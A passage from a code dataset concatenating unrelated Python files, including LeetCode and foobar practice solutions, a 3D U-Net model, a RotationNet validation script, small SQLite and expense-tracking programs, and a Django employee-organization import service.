JsonResponse\n \"\"\"Function will return either True or False depending if a subdomain exists or not.\"\"\"\n return JsonResponse({\n 'access-granted':True\n })\n","repo_name":"smegurus/smegurus-django","sub_path":"tenant_profile/views/me_views.py","file_name":"me_views.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15610595941","text":"\"\"\"\n\n1275. Find Winner on a Tic Tac Toe Game\nEasy\n\nTic-tac-toe is played by two players A and B on a 3 x 3 grid. The rules of Tic-Tac-Toe are:\n\nPlayers take turns placing characters into empty squares ' '.\nThe first player A always places 'X' characters, while the second player B always places 'O' characters.\n'X' and 'O' characters are always placed into empty squares, never on filled ones.\nThe game ends when there are three of the same (non-empty) character filling any row, column, or diagonal.\nThe game also ends if all squares are non-empty.\nNo more moves can be played if the game is over.\nGiven a 2D integer array moves where moves[i] = [rowi, coli] indicates that the ith move will be played on grid[rowi][coli]. return the winner of the game if it exists (A or B). In case the game ends in a draw return \"Draw\". 
If there are still movements to play return \"Pending\".\n\nYou can assume that moves is valid (i.e., it follows the rules of Tic-Tac-Toe), the grid is initially empty, and A will play first.\n\n \n\nExample 1:\n\n\nInput: moves = [[0,0],[2,0],[1,1],[2,1],[2,2]]\nOutput: \"A\"\nExplanation: A wins, they always play first.\nExample 2:\n\n\nInput: moves = [[0,0],[1,1],[0,1],[0,2],[1,0],[2,0]]\nOutput: \"B\"\nExplanation: B wins.\nExample 3:\n\n\nInput: moves = [[0,0],[1,1],[2,0],[1,0],[1,2],[2,1],[0,1],[0,2],[2,2]]\nOutput: \"Draw\"\nExplanation: The game ends in a draw since there are no moves to make.\n \n\nConstraints:\n\n1 <= moves.length <= 9\nmoves[i].length == 2\n0 <= rowi, coli <= 2\nThere are no repeated elements on moves.\nmoves follow the rules of tic tac toe.\n\n\"\"\"\n\n# V0\n\n# V1\n# IDEA : BRUTE FORCE\n# https://leetcode.com/problems/find-winner-on-a-tic-tac-toe-game/solution/\nclass Solution:\n def tictactoe(self, moves: List[List[int]]) -> str:\n\n # Initialize the board, n = 3 in this problem.\n n = 3\n board = [[0] * n for _ in range(n)]\n \n # Check if any of 4 winning conditions to see if the current player has won.\n def checkRow(row, player_id):\n for col in range(n):\n if board[row][col] != player_id:\n return False\n return True\n \n def checkCol(col, player_id):\n for row in range(n):\n if board[row][col] != player_id:\n return False\n return True\n \n def checkDiagonal(player_id):\n for row in range(n):\n if board[row][row] != player_id:\n return False\n return True\n \n def checkAntiDiagonal(player_id):\n for row in range(n):\n if board[row][n - 1 - row] != player_id:\n return False\n return True\n \n # Start with player_1.\n player = 1\n\n for move in moves:\n row, col = move\n board[row][col] = player\n \n # If any of the winning conditions is met, return the current player's id.\n if checkRow(row, player) or checkCol(col, player) or \\\n (row == col and checkDiagonal(player)) or \\\n (row + col == n - 1 and checkAntiDiagonal(player)):\n return 'A' if player == 1 else 'B'\n \n # If no one wins so far, change to the other player alternatively. \n # That is from 1 to -1, from -1 to 1.\n player *= -1\n \n # If all moves are completed and there is still no result, we shall check if\n # the grid is full or not. If so, the game ends with draw, otherwise pending. \n return \"Draw\" if len(moves) == n * n else \"Pending\"\n\n# V1'\n# IDEA : RECORD EACH MOVE\n# https://leetcode.com/problems/find-winner-on-a-tic-tac-toe-game/solution/\nclass Solution:\n def tictactoe(self, moves: List[List[int]]) -> str:\n\n # n stands for the size of the board, n = 3 for the current game.\n n = 3\n\n # use rows and cols to record the value on each row and each column.\n # diag1 and diag2 to record value on diagonal or anti-diagonal.\n rows, cols = [0] * n, [0] * n\n diag = anti_diag = 0\n \n # Two players having value of 1 and -1, player_1 with value = 1 places first.\n player = 1\n \n for row, col in moves:\n \n # Update the row value and column value.\n rows[row] += player\n cols[col] += player\n \n # If this move is placed on diagonal or anti-diagonal, \n # we shall update the relative value as well.\n if row == col: \n diag += player\n if row + col == n - 1:\n anti_diag += player\n \n # check if this move meets any of the winning conditions.\n if any(abs(line) == n for line in (rows[row], cols[col], diag, anti_diag)):\n return \"A\" if player == 1 else \"B\"\n \n # If no one wins so far, change to the other player alternatively. 
\n # That is from 1 to -1, from -1 to 1.\n player *= -1\n \n # If all moves are completed and there is still no result, we shall check if \n # the grid is full or not. If so, the game ends with draw, otherwise pending.\n return \"Draw\" if len(moves) == n * n else \"Pending\" \n\n# V2","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Array/find-winner-on-a-tic-tac-toe-game.py","file_name":"find-winner-on-a-tic-tac-toe-game.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"20814904041","text":"import os\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom PyInquirer import prompt\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import ImageFolder\n\nfrom commands import Command\nfrom transforms import rotation_net_regulation_transformer\nfrom utils import AverageMeter, random_input, rotation_net_accuracy\n\n\nclass ValidateCommand(Command):\n name = \"Validating\"\n\n def command(self, context: Dict):\n batch_size_menu = {\n \"type\": \"input\",\n \"name\": \"batch_size\",\n \"message\": \"Batch Size:\",\n \"default\": \"240\",\n }\n batch_size = int(prompt(batch_size_menu)[\"batch_size\"])\n\n viewpoint_menu = {\n \"type\": \"input\",\n \"name\": \"viewpoint_num\",\n \"message\": \"Viewpoint num:\",\n \"default\": \"80\",\n }\n viewpoint_num = int(prompt(viewpoint_menu)[\"viewpoint_num\"])\n\n self.validate(batch_size, viewpoint_num)\n\n @classmethod\n def validate(cls, batch_size, viewpoint_num):\n if not os.path.exists(\"rotation_net.pth\"):\n print(\"模型未找到\")\n\n pth = torch.load(\"rotation_net.pth\")\n model = pth[\"model\"]\n epoch = pth[\"epoch\"]\n\n test_dataset = DataLoader(\n ImageFolder(\n \"data/ModelNet40v2/modelnet/test\",\n transform=rotation_net_regulation_transformer\n ),\n pin_memory=True,\n batch_size=batch_size,\n shuffle=False,\n )\n random_input(test_dataset, viewpoint_num)\n matrix = np.load(\"matrix2.npy\")\n\n print(f\"模型已经训练: {epoch}次\")\n model.eval()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n with torch.no_grad():\n\n for i, (samples, targets) in enumerate(test_dataset):\n targets = targets.cuda()\n # compute output\n output = model(samples.cuda())\n # log_softmax and reshape output\n num_classes = int(output.size(1) / viewpoint_num) - 1\n output = output.view(-1, num_classes + 1)\n output = torch.log_softmax(output, dim=1)\n output = output[:, :-1] - torch.t(output[:, -1].repeat(1, output.shape[1] - 1).view(output.shape[1] - 1, -1))\n output = output.view(-1, viewpoint_num *\n viewpoint_num, num_classes)\n\n # measure accuracy and record loss\n pred_1, pred_5 = rotation_net_accuracy(output.data,\n targets,\n matrix=matrix,\n viewpoint_num=viewpoint_num,\n top_k=(1, 5))\n top1.update(pred_1.item(), samples.shape[0] / viewpoint_num)\n top5.update(pred_5.item(), samples.shape[0] / viewpoint_num)\n\n print(f\"Top1 Accuracy: {top1.avg}\")\n print(f\"Top5 Accuracy: {top5.avg}\")\n","repo_name":"lingfromSh/rotation-net-implement-pytorch","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71699683043","text":"from proje import *\n\nprint(\"\"\"Kütüphane programına hoşgeldiniz...\n1-Veri ekleme\n\n2-Veri silme\n\n4-Verileri öğrenme\n\n5-Veri sorgulama\n\n6-Baskı sayısını yükseltme\n\nÇıkmak için 'q'ya basınız...\n\"\"\")\nkutuphane = kutuphane()\nwhile True:\n 
islem = input(\"Yapmak istediğiniz işlemi seçiniz:\")\n if islem == \"q\" or islem == \"Q\":\n print(\"Program kapatılıyor...\")\n kutuphane.baglantikes()\n time.sleep(2)\n break\n elif not islem:\n print(\"Lütfen boş bırakmayınız...\")\n elif islem == \"1\":\n isim = input(\"Kitabın ismini giriniz:\")\n yazar = input(\"Yazarın ismini giriniz:\")\n tur = input(\"Tür'ü giriniz:\")\n yayinevi = input(\"Yayınevi ismini giriniz:\")\n baski = int(input(\"Baskı sayısını giriniz:\"))\n if not isim or not yazar or not tur or not yayinevi or not baski:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veriler ekleniyor...\")\n time.sleep(2)\n kutuphane.veriekleme(isim, yazar, tur, yayinevi, baski)\n print(\"Veriler başarıyla eklendi.\")\n elif islem == \"2\":\n dataone0 = input(\"Silinecek kitabın ismi:\")\n if not dataone0:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veri siliniyor...\")\n time.sleep(2)\n kutuphane.verisilme(dataone0)\n print(\"Veri silindi\")\n elif islem == \"4\":\n print(\"Veriler yazdırılıyor...\")\n time.sleep(3)\n kutuphane.bilgilerigoster()\n elif islem == \"5\":\n dataone2 = input(\"Sorgulanacak kitap ismi:\")\n if not dataone2:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veriler yazdırılıyor\")\n time.sleep(1.5)\n kutuphane.verisorgulama(dataone2)\n elif islem == \"6\":\n dataone3 = input(\"Baskı sayısını yükseltmek istediğiniz kitabı giriniz:\")\n if not dataone3:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Baskı yükseltiliyor...\")\n time.sleep(1)\n kutuphane.baskiyukselt(dataone3)\n print(\"Baskı yükseltildi...\")\n else:\n print(\"Hatalı tuşlama lütfen tekrar deneyiniz\")","repo_name":"angryfoxx/python_egzersizleri","sub_path":"sqlite veritabanı/proje_deneme.py","file_name":"proje_deneme.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"14466226905","text":"from abc import ABCMeta, abstractmethod\nimport numpy as np\n\nclass BaseSubspace(metaclass=ABCMeta):\n def __init__(self, measurements=None, A=None, k=None, rank=None, pks=[], name=''):\n # Check A\n if A is None:\n self.__A = np.asarray(a=1, dtype=measurements.dtype)\n else:\n # Check the type and number of dimensions of A\n if not (type(A) is np.ndarray):\n raise ValueError('A must be an array')\n else:\n if not (len(A.shape) == 2):\n raise ValueError(\"Dimensions of A must be 2\")\n self.__A = np.asarray(A)\n # Shape of A\n m, n = A.shape\n self.__At = np.transpose(np.conjugate(self.__A))\n\n # Check measurements\n if measurements is None:\n self._measurements = np.asarray(1)\n else:\n if not (type(measurements) is np.ndarray):\n raise ValueError('measurements must be an array')\n\n # Check the dimensions of the measurements\n if not (measurements.shape[0] == A.shape[0]):\n raise ValueError(\"The dimension of y is not consistent with the dimensions of A\")\n\n self.__measurements = np.asarray(a=measurements, dtype=measurements.dtype)\n\n # Control of the value of k\n if k is None:\n print('WARNING: Unknown sparsity considered. 
Some of the algorithms may not be applicable.')\n self.__k = k\n else:\n if k > self.A.shape[1]:\n raise ValueError(\"k cannot be larger than the number of atoms\")\n else:\n self.__k = k\n\n # Assign the given rank\n if rank is not None:\n if rank < 0:\n raise ValueError('rank must be positive.')\n self._rank = rank\n\n # Check the partially known support\n if not(type(pks) is list):\n self._pks = pks.tolist()\n else:\n self._pks = pks\n\n # Create the solution\n self.sol = np.zeros(shape=(n, measurements.shape[1]), dtype=measurements.dtype)\n self.support_sol = []\n\n # Assign the name\n self.__name = name\n\n @abstractmethod\n def solve(self, threshold):\n pass\n\n @property\n def A(self):\n return self.__A\n\n @property\n def At(self):\n return self.__At\n\n @property\n def measurements(self):\n return self.__measurements\n\n @property\n def k(self):\n return self.__k\n\n @property\n def name(self):\n return self.__name\n\n @property\n def rank(self):\n return self._rank\n\n @property\n def pks(self):\n return self._pks\n\n def estimate_measurement_rank(self):\n return np.linalg.matrix_rank(M=self.measurements, tol=None, hermitian=False)\n\n def compute_covariance_matrix(self):\n return np.matmul(self.measurements, np.conjugate(self.measurements.T)) / self.measurements.shape[1]\n\n def estimate_signal_subspace(self, threshold=0.01):\n # Compute the covariance matrix\n gamma = self.compute_covariance_matrix()\n\n # EVD\n eig_vals, eig_vecs = np.linalg.eigh(gamma, UPLO='L')\n eig_vals = eig_vals[::-1]\n eig_vecs = eig_vecs[:, ::-1]\n\n # If the rank is not known - Estimate the rank\n if self._rank is None:\n # Shape of the measurements\n m = self.measurements.shape[0]\n\n # Estimate the dimension of the signal subspace\n eig_diff = np.abs(np.diff(eig_vals))\n ind = np.where(eig_diff >= threshold*eig_vals[0])[0][-1]\n self._rank = m - ind\n\n # r dominant eigenvectors of the covariance matrix\n U = eig_vecs[:,:self._rank]\n\n # Projection matrix\n P = np.matmul(U, np.conjugate(U.T))\n\n return P\n\n def estimate_noise_subspace(self, threshold=0.1):\n # Compute the covariance matrix\n gamma = self.compute_covariance_matrix()\n\n # EVD\n eig_vals, eig_vecs = np.linalg.eigh(gamma, UPLO='L')\n eig_vals = eig_vals[::-1]\n eig_vecs = eig_vecs[:, ::-1]\n\n # If the rank is not known - Estimate the rank\n if self._rank is None:\n # Shape of the measurements\n m = self.measurements.shape[0]\n\n # Estimate the dimension of the signal subspace\n eig_diff = np.diff(eig_vals)\n ind = np.where(eig_diff >= threshold*eig_vals[0])[0]\n self._rank = m - ind\n\n # n-r lowest eigenvectors of the covariance matrix\n U = eig_vecs[:,self.rank:]\n\n # Projection matrix\n P = np.matmul(U, np.conjugate(U.T))\n\n return P","repo_name":"AdriBesson/joint_sparse_algorithms","sub_path":"subspacemethods/basesubspace.py","file_name":"basesubspace.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"5302828049","text":"import settings\nimport tensorflow as tf\n\nfrom argparser import args\nfrom tensorflow import keras as K\n\ndef dice_coef(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n prediction = tf.round(prediction) # Round to 0 or 1\n\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) 
* intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\ndef soft_dice_coef(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\ndef dice_loss(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n p = tf.reduce_sum(prediction, axis=axis)\n t = tf.reduce_sum(target, axis=axis)\n numerator = tf.reduce_mean(intersection + smooth)\n denominator = tf.reduce_mean(t + p + smooth)\n dice_loss = -tf.math.log(2.*numerator) + tf.math.log(denominator)\n\n return dice_loss\n\ndef unet_3d(input_dim, filters=settings.filters,\n no_output_classes=args.output_classes,\n use_upsampling=settings.use_upsampling,\n concat_axis=-1, model_name=settings.net2_seg_modelname):\n\n def ConvolutionBlock(x, name, filters, params):\n x = K.layers.Conv3D(filters=filters, **params, name=name+\"_conv0\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn0\")(x)\n x = K.layers.Activation(\"relu\", name=name+\"_relu0\")(x)\n\n x = K.layers.Conv3D(filters=filters, **params, name=name+\"_conv1\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn1\")(x)\n x = K.layers.Activation(\"relu\", name=name)(x)\n\n return x\n \n inputs = K.layers.Input(shape=input_dim, name=\"MRImages\")\n \n params = dict(kernel_size=(3, 3, 3), activation=None,\n padding=\"same\", kernel_initializer=\"he_uniform\")\n\n # Transposed convolution parameters\n params_trans = dict(kernel_size=(2, 2, 2), strides=(2, 2, 2),\n padding=\"same\", kernel_initializer=\"he_uniform\")\n\n # BEGIN - Encoding path\n encodeA = ConvolutionBlock(inputs, \"encodeA\", filters, params)\n poolA = K.layers.MaxPooling3D(name=\"poolA\", pool_size=(2, 2, 2))(encodeA)\n\n encodeB = ConvolutionBlock(poolA, \"encodeB\", filters*2, params)\n poolB = K.layers.MaxPooling3D(name=\"poolB\", pool_size=(2, 2, 2))(encodeB)\n\n encodeC = ConvolutionBlock(poolB, \"encodeC\", filters*4, params)\n poolC = K.layers.MaxPooling3D(name=\"poolC\", pool_size=(2, 2, 2))(encodeC)\n\n encodeD = ConvolutionBlock(poolC, \"encodeD\", filters*8, params)\n poolD = K.layers.MaxPooling3D(name=\"poolD\", pool_size=(2, 2, 2))(encodeD)\n\n encodeE = ConvolutionBlock(poolD, \"encodeE\", filters*16, params)\n # END - Encoding path\n\n # BEGIN - Decoding path\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upE\", size=(2, 2, 2))(encodeE)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvE\", filters=filters*8,**params_trans)(encodeE)\n\n concatD = K.layers.concatenate([up, encodeD], axis=concat_axis, name=\"concatD\")\n\n decodeC = ConvolutionBlock(concatD, \"decodeC\", filters*8, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upC\", size=(2, 2, 2))(decodeC)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvC\", filters=filters*4,**params_trans)(decodeC)\n \n concatC = K.layers.concatenate([up, encodeC], axis=concat_axis, name=\"concatC\")\n\n decodeB = ConvolutionBlock(concatC, \"decodeB\", filters*4, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upB\", size=(2, 2, 2))(decodeB)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvB\", filters=filters*2, **params_trans)(decodeB)\n \n concatB = K.layers.concatenate([up, encodeB], axis=concat_axis, 
name=\"concatB\")\n\n decodeA = ConvolutionBlock(concatB, \"decodeA\", filters*2, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upA\", size=(2, 2, 2))(decodeA)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvA\", filters=filters,**params_trans)(decodeA)\n \n concatA = K.layers.concatenate([up, encodeA], axis=concat_axis, name=\"concatA\")\n\n # END - Decoding path\n\n convOut = ConvolutionBlock(concatA, \"convOut\", filters, params)\n\n prediction = K.layers.Conv3D(name=\"PredictionMask\",\n filters=no_output_classes,\n kernel_size=(1, 1, 1),\n activation=\"sigmoid\")(convOut)\n \n model = K.models.Model(inputs=[inputs], outputs=[prediction],name=model_name)\n\n return model","repo_name":"devdinie/UMAGeT","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31997981729","text":"digitos = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')\n\ndef totalGasto():\n dic = {}\n \n with open(\"gastos.txt\") as gastos:\n for linha in gastos:\n if linha.startswith(digitos) == False:\n categoria = linha.strip(\"\\n\").split(\",\")[0]\n dic[categoria] = 0\n else:\n valorInteiro = linha.strip(\"\\n\").split(\",\")[2]\n valorDecimal = linha.strip(\"\\n\").split(\",\")[3]\n valor = valorInteiro + '.' + valorDecimal\n\n dic[categoria] += float(valor)\n \n return dic\n \n\ngastosMensais = totalGasto()\n\n# Para acessar as chaves do dicionario, use: \n# for chave in dicionario\n# Já para os valores: \n# for valor in dicionario.values()\n# E para os pares:\nfor categoria, valor in gastosMensais.items(): \n print(f\"Gastos na categoria {categoria}:\", valor, \"reais\")\n\n","repo_name":"OmarMesqq/faculdade","sub_path":"puc/CTC4002/G2/exercicio_2.py","file_name":"exercicio_2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71981203681","text":"from fractions import Fraction\nimport collections\n\nloop_probability = lambda x : Fraction(1, 1-x)\n\ndef calculate_loop_states(sources, next_stage_probability, loop_states=[], calculated_loop_states=[]):\n # [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n record = calculated_loop_states\n loop_list = {}\n for source in sources:\n if not source in record:\n record.append(source)\n if source in loop_list:\n loop_list[source].update([v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]])\n else:\n loop_list[source] = [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n if not loop_list or source not in loop_list:\n # print(\"> \", loop_states, record)\n return loop_states\n else:\n loop_states.append(loop_list)\n return calculate_loop_states(loop_list[source], next_stage_probability, loop_states, record)\n\n\ndef calculate_probability_of_node(matrix, terminals):\n d={}\n count =0\n next_stage_probability={}\n for row in matrix:\n count2=0\n if count in terminals:\n d[count] = []\n current_row_denominator = sum(row)\n d[count] = []\n for element in row:\n if element != 0:\n if count in next_stage_probability:\n next_stage_probability[count].update({count2: Fraction(element, current_row_denominator)})\n else:\n next_stage_probability[count] = ({count2: Fraction(element, current_row_denominator)})\n d[count].append(count2)\n count2 +=1\n count+=1\n 
return next_stage_probability, d\n\n\ndef find_all_paths(nsp, start, end, path=[]):\n path = path + [start]\n if start == end:\n return [path]\n if not nsp.__contains__(start):\n return []\n paths = []\n for node in next_stage_probability[start]:\n if node not in path:\n newpaths = find_all_paths(nsp, node, end, path)\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\ndef answer(m):\n print(\"***********************\")\n from pprint import pprint\n print(\"matrix is:\")\n pprint(m)\n # global paths\n paths = []\n terminals = []\n stage_probability = {}\n for rows in range(len(m)):\n if sum(m[rows]) == 0:\n terminals.append(rows)\n stage_probability[rows] = 0\n\n next_stage_probability, d = calculate_probability_of_node(m, terminals)\n print(\"next_stage_probability: {}\".format(next_stage_probability))\n\n paths_to_terminal = {}\n for terminal in terminals:\n paths_to_terminal[terminal] = find_all_paths(next_stage_probability=next_stage_probability, start=0, end=terminal)\n print(\"paths_to_terminal: {}\".format(paths_to_terminal))\n\n # this is important stage where next_stage_probability is your tree and you need to calculate probability to reach to states in terminals which are values 0 rows in matrix\n terminal_probability = {}\n for terminal_state in paths_to_terminal:\n if paths_to_terminal[terminal_state]:\n probability_for_this_terminal = 0\n considered_loop = []\n for path in paths_to_terminal[terminal_state]:\n this_path_probability = 1\n for x in range(len(path)-1):\n source, destination = path[x], path[x+1]\n current_to_next = next_stage_probability[source][destination]\n #################################################\n # I need this valie of loop_list to be accurate #\n #################################################\n # loop_list = [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n loop_list = calculate_loop_states([source], next_stage_probability)\n this_path_probability = this_path_probability * current_to_next\n # loop_list = set(loop_list) - {source}\n # print(\">> \",path, (source, destination),loop_list, this_path_probability)\n print(\"path: {} \\t source: {} \\t destination: {} \\t loop_list: {} \\t this_path_probability: {} \\t\".format(path, source, destination, loop_list, this_path_probability))\n if loop_list:\n for loop_state in loop_list:\n # print((source, loop_state))\n for key_state in loop_state:\n for next_state in loop_state[key_state]:\n if not considered_loop.__contains__((key_state, next_state)) and not considered_loop.__contains__((next_state, key_state)):\n # loop_val = next_stage_probability[source][loop_state] * next_stage_probability[loop_state][source]\n if key_state in next_stage_probability and next_state in next_stage_probability:\n if next_state in next_stage_probability[key_state] and key_state in next_stage_probability[next_state]:\n loop_val = next_stage_probability[key_state][next_state] * next_stage_probability[next_state][key_state]\n this_path_probability = this_path_probability * loop_probability(loop_val)\n considered_loop.append((key_state, next_state))\n print(\"s: {} \\t d: {} \\t loop_val: {} \\t this_path_probability: {} \\t break_val: {}\".format(key_state, next_state, loop_val, this_path_probability, loop_probability(loop_val)))\n print(this_path_probability)\n probability_for_this_terminal = probability_for_this_terminal + this_path_probability\n terminal_probability[terminal_state] = probability_for_this_terminal\n else:\n 
terminal_probability[terminal_state] = Fraction(0)\n print(terminal_probability)\n max_denominator = max([v.denominator for k,v in terminal_probability.items()])\n\n final_state_probability = []\n for terminal in terminal_probability:\n current_denominator = terminal_probability[terminal].denominator\n if not current_denominator == max_denominator:\n multiplier = max_denominator / current_denominator\n # print(multiplier)\n else:\n multiplier = 1\n final_state_probability.append(int(terminal_probability[terminal].numerator * multiplier))\n # print(\"terminal {} : {} --> {}\".format(terminal, stage_probability[terminal], int(terminal.numerator * multiplier)))\n final_state_probability.append(max_denominator)\n return final_state_probability\n\n\n# test cases below\n# print(answer([[0, 2, 1, 0, 0], [0, 0, 0, 3, 4], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]))\nprint(answer([[0, 7, 0, 5], [2, 0, 3, 0], [2, 5, 0, 0], [0, 0, 0, 0]]))\n# print(answer([[0, 1, 0, 0, 0, 1], [4, 0, 0, 3, 2, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 1, 0, 0, 0], [0, 0, 0, 7, 0, 0], [0, 0, 0, 2, 0, 1], [0, 0, 0, 0, 5, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 2, 0, 0, 0], [0, 0, 0, 1, 0, 1], [0, 0, 0, 7, 0, 0], [0, 0, 5, 0, 4, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 2, 0, 0, 0], [0, 0, 0, 1, 0, 1], [0, 0, 0, 7, 0, 0], [0, 0, 0, 0, 4, 5], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 1, 0, 0, 0, 1], [4, 0, 2, 3, 2, 1], [9, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n","repo_name":"gahan9/mystuff","sub_path":"foobar/level_3-96hrs/2/solution0.py","file_name":"solution0.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15440378060","text":"from datetime import datetime\nfrom StringIO import StringIO\nfrom django.contrib.auth import get_user_model\n\nfrom app.models.employee_profile import EmployeeProfile\nfrom app.dtos.operation_result import OperationResult\nfrom app.dtos.employee_organization.employee_organization_setup_data \\\n import EmployeeOrganizationSetupData\nfrom app.serializers.employee_organization.employee_organization_setup_data_serializer \\\n import EmployeeOrganizationSetupDataSerializer, EmployeeOrganizationSetupDataPostSerializer\n\nUser = get_user_model()\n\n\nclass EmployeeOrganizationService(object):\n FIELD_FIRST_NAME = 'first_name'\n FIELD_LAST_NAME = 'last_name'\n FIELD_MANAGER_FIRST_NAME = 'manager_first_name'\n FIELD_MANAGER_LAST_NAME = 'manager_last_name'\n FIELD_RECORD_END = 'record-end'\n\n REQUIRED_RAW_DATA_FIELDS = [\n FIELD_FIRST_NAME,\n FIELD_LAST_NAME,\n FIELD_MANAGER_FIRST_NAME,\n FIELD_MANAGER_LAST_NAME,\n FIELD_RECORD_END\n ]\n\n def parse_batch_employee_organization_import_raw_data(self, batch_import_raw_data):\n result = OperationResult(batch_import_raw_data)\n parsed_org_data_list = []\n\n # check all lines for number of fields\n # if found bad ones, send the main wrapper back without\n # construting the individual ones\n for line in batch_import_raw_data.raw_data.split('\\n'):\n if (not line.strip()):\n continue\n\n tokens = line.split('\\t')\n\n if (len(tokens) != len(self.REQUIRED_RAW_DATA_FIELDS)):\n result.append_issue(\n 'The line [%s] fails to parse properly. 
Reason: Do not have enough number of fields' % line\n )\n else:\n\n # parse the fields into domain object and \n # construct the DTO needed\n org_data = {\n 'company_id': batch_import_raw_data.company_id,\n 'employee_first_name': self._get_field_value(tokens, self.FIELD_FIRST_NAME),\n 'employee_last_name': self._get_field_value(tokens, self.FIELD_LAST_NAME),\n 'manager_first_name': self._get_field_value(tokens, self.FIELD_MANAGER_FIRST_NAME),\n 'manager_last_name': self._get_field_value(tokens, self.FIELD_MANAGER_LAST_NAME)\n }\n\n # Parse the line into objects\n # Utilize serializers to perform all the details\n serializer = EmployeeOrganizationSetupDataPostSerializer(data=org_data)\n\n if (not serializer.is_valid()):\n result.append_issue(\n 'The line [%s] fails to parse properly. Reasons:[%s]' % (line, serializer.errors)\n )\n else:\n parsed_org_data_list.append(serializer.object)\n\n # Do batch validation,\n # - Collect batch level issues into the result\n # - include the list of validated account data as output\n batch_validation_result = self.batch_validate_employee_organization_setup_data(parsed_org_data_list)\n batch_validation_result.copy_issues_to(result)\n result.set_output_data(batch_validation_result.output_data)\n\n return result\n\n def _get_field_value(self, field_values, field_name):\n index = self.REQUIRED_RAW_DATA_FIELDS.index(field_name)\n if (index < 0 or index >= len(field_values)):\n return None\n return field_values[index]\n\n def batch_execute_employee_organization_setup(self, organization_setup_data_list):\n result = self.batch_validate_employee_organization_setup_data(\n organization_setup_data_list)\n\n if (result.has_issue()):\n raise Exception(\n \"Encountered validation issues while executing batch employee organization setup!\")\n\n execute_results = []\n\n # Batch process\n for data in organization_setup_data_list:\n execute_result = self.execute_employee_organization_setup(data, False)\n execute_results.append(execute_result)\n\n result.set_output_data(execute_results)\n return result\n\n def execute_employee_organization_setup(self, organization_setup_data, do_validation=True):\n result = None\n\n # Do validation first, and short circuit if failed\n if (do_validation):\n result = self.validate_employee_organization_setup_data(organization_setup_data)\n else:\n # directly construct the result, skipping validation\n result = OperationResult(organization_setup_data)\n\n # If the operation input info is not valid to begin with\n # simply short circuit and return it\n if (result.has_issue()):\n raise Exception(\n \"Encountered validation issues while executing employee organization setup!\")\n\n # get employee profile to update\n employee_profile = organization_setup_data.get_employee_profile()\n\n # get manager's profile\n manager_profile = organization_setup_data.get_manager_profile()\n\n # now do the assignment\n employee_profile.manager = manager_profile\n employee_profile.save()\n\n result.set_output_data(organization_setup_data)\n return result\n\n def batch_validate_employee_organization_setup_data(self, organization_setup_data_list):\n result = OperationResult(organization_setup_data_list)\n\n if (not 